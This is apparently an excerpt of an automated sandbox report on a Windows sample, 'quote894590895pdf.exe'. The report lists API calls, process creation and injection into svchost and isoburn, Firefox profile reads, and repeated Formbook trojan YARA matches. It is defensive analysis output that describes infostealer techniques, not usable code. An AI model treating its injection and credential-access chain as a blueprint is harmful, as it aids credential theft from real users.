            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03973D10 NtOpenProcessToken,1_2_03973D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03973D70 NtOpenThread,1_2_03973D70
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00ECA279: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00ECA279
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00EB8638 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00EB8638
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00EC5264 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00EC5264
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E6E8000_2_00E6E800
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E8DAF50_2_00E8DAF5
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E6FE400_2_00E6FE40
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E6E0600_2_00E6E060
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E741400_2_00E74140
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E823450_2_00E82345
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00EE04650_2_00EE0465
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E964520_2_00E96452
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E925AE0_2_00E925AE
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E8277A0_2_00E8277A
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00EE08E20_2_00EE08E2
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E768410_2_00E76841
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E969C40_2_00E969C4
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E789680_2_00E78968
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00EBE9280_2_00EBE928
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00EC89320_2_00EC8932
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E9890F0_2_00E9890F
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E8CCA10_2_00E8CCA1
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E96F360_2_00E96F36
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E770FE0_2_00E770FE
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E731900_2_00E73190
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E612870_2_00E61287
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E8F3590_2_00E8F359
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E833070_2_00E83307
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E756800_2_00E75680
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E816040_2_00E81604
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E758C00_2_00E758C0
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E878130_2_00E87813
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E81AF80_2_00E81AF8
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E99C350_2_00E99C35
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00EE7E0D0_2_00EE7E0D
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E8BF260_2_00E8BF26
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E81F100_2_00E81F10
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_01AB96080_2_01AB9608
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401AB31_2_00401AB3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004183131_2_00418313
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004010001_2_00401000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004028301_2_00402830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004030AA1_2_004030AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004030B01_2_004030B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042E9931_2_0042E993
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040230D1_2_0040230D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004023101_2_00402310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040438F1_2_0040438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FB9A1_2_0040FB9A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FBA31_2_0040FBA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402C5A1_2_00402C5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402C601_2_00402C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004024C01_2_004024C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004164FE1_2_004164FE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004024B31_2_004024B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004165031_2_00416503
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FDC31_2_0040FDC3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DE431_2_0040DE43
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A003E61_2_03A003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E3F01_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FA3521_2_039FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C02C01_2_039C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E02741_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A001AA1_2_03A001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F41A21_2_039F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F81CC1_2_039F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DA1181_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039301001_2_03930100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C81581_2_039C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D20001_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393C7C01_2_0393C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039647501_2_03964750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039407701_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395C6E01_2_0395C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A005911_2_03A00591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039405351_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EE4F61_2_039EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E44201_2_039E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F24461_2_039F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F6BD71_2_039F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FAB401_2_039FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA801_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A0A9A61_2_03A0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A01_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039569621_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039268B81_2_039268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E8F01_2_0396E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394A8401_2_0394A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039428401_2_03942840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BEFA01_2_039BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932FC81_2_03932FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03960F301_2_03960F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E2F301_2_039E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03982F281_2_03982F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4F401_2_039B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952E901_2_03952E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FCE931_2_039FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FEEDB1_2_039FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FEE261_2_039FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940E591_2_03940E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03958DBF1_2_03958DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393ADE01_2_0393ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DCD1F1_2_039DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394AD001_2_0394AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0CB51_2_039E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930CF21_2_03930CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940C001_2_03940C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0398739A1_2_0398739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F132D1_2_039F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392D34C1_2_0392D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039452A01_2_039452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395B2C01_2_0395B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395D2F01_2_0395D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E12ED1_2_039E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394B1B01_2_0394B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A0B16B1_2_03A0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392F1721_2_0392F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397516C1_2_0397516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EF0CC1_2_039EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039470C01_2_039470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F70E91_2_039F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FF0E01_2_039FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FF7B01_2_039FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F16CC1_2_039F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DD5B01_2_039DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F75711_2_039F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FF43F1_2_039FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039314601_2_03931460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395FB801_2_0395FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B5BF01_2_039B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397DBF91_2_0397DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFB761_2_039FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DDAAC1_2_039DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03985AA01_2_03985AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1AA31_2_039E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EDAC61_2_039EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFA491_2_039FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F7A461_2_039F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B3A6C1_2_039B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D59101_2_039D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039499501_2_03949950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395B9501_2_0395B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039438E01_2_039438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AD8001_2_039AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03941F921_2_03941F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFFB11_2_039FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFF091_2_039FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03949EB01_2_03949EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395FDC01_2_0395FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F1D5A1_2_039F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03943D401_2_03943D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F7D731_2_039F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFCF21_2_039FFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B9C321_2_039B9C32
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeCode function: 5_2_032A4E245_2_032A4E24
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeCode function: 5_2_032A6BCF5_2_032A6BCF
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeCode function: 5_2_032A6BD85_2_032A6BD8
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeCode function: 5_2_032C59C85_2_032C59C8
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeCode function: 5_2_032AD5385_2_032AD538
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeCode function: 5_2_032AD5335_2_032AD533
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeCode function: 5_2_032A6DF85_2_032A6DF8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0392B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03975130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039BF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03987E54 appears 99 times
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: String function: 00E80C63 appears 70 times
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: String function: 00E88A80 appears 42 times
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: String function: 00E67F41 appears 35 times
            Source: quote894590895pdf.exe, 00000000.00000003.1723474506.00000000048AD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs quote894590895pdf.exe
            Source: quote894590895pdf.exe, 00000000.00000003.1726870554.0000000004753000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs quote894590895pdf.exe
            Source: quote894590895pdf.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3585567216.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3587672328.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2123235941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2123644785.00000000037F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3585604704.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2124174158.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3584633901.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3585641662.0000000003050000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@9/7
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00ECA0F4 GetLastError,FormatMessageW,0_2_00ECA0F4
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00EB84F3 AdjustTokenPrivileges,CloseHandle,0_2_00EB84F3
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00EB8AA3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00EB8AA3
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00ECB3BF SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00ECB3BF
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00EDEF21 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00EDEF21
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00ED84D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_00ED84D0
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E64FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00E64FE9
            Source: C:\Users\user\Desktop\quote894590895pdf.exeFile created: C:\Users\user\AppData\Local\Temp\aut9F4.tmpJump to behavior
            Source: quote894590895pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\quote894590895pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: isoburn.exe, 00000006.00000003.2321340554.0000000003342000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.2321340554.0000000003364000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.3584832817.0000000003364000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: quote894590895pdf.exeReversingLabs: Detection: 36%
            Source: unknownProcess created: C:\Users\user\Desktop\quote894590895pdf.exe "C:\Users\user\Desktop\quote894590895pdf.exe"
            Source: C:\Users\user\Desktop\quote894590895pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\quote894590895pdf.exe"
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeProcess created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"
            Source: C:\Windows\SysWOW64\isoburn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\quote894590895pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\quote894590895pdf.exe"Jump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeProcess created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\quote894590895pdf.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\quote894590895pdf.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\quote894590895pdf.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\quote894590895pdf.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\quote894590895pdf.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\quote894590895pdf.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\quote894590895pdf.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\quote894590895pdf.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\quote894590895pdf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\quote894590895pdf.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\quote894590895pdf.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\quote894590895pdf.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: wldp.dllJump to behavior
